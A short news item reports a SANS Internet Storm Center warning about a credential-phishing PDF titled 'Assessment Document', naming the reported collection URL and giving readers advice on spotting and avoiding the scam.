Late last week the SANS Internet Storm Center published a warning concerning a new and active phishing scam that uses PDF attachments in an attempt to gather user email credentials. The bulletin, which was published initially on the SANS website, includes screenshots of the PDF attachment that was reported to them.
The scam lies around users being asked to open the PDF, which is called “Assessment Document” and enter their own email address and password to gain access to it. Upon entering the details, the PDF will then attempt to open a malicious website designed to store the email information entered and then use it to gain a foothold into your organisation and any other linked accounts or computers on the network.
The URL the PDF tries to open was originally reported as http://chai.myjino.ru. The body of the email itself also includes the message, “PDF Secure File UNLOCK to Access File Content.”
Prudent PDF and email users should always be vigilant when opening attachments from unknown sources – in this case, the sender was named “VetMeds” and the domain was from a school domain, so on first glance could look trustworthy. However, the PDF itself was an invoice for a SWIFT transaction, which should be a warning flag. Make sure you are using an updated PDF reader, as these will always ask before opening a URL even if credentials have been supplied. Users of the Edge browser, however, must be aware that this opens PDF files within the browser by default and does not ask for permission! In this case, it would be wise to change Windows 10 settings to allow a third party PDF reader to open PDF files instead, as a general rule.
Additionally, genuine PDF documents that have been locked will not ask for email details as the credentials. There will be a password box and this will have been set by the original creator of the document, so there is no need to fill in personal password details.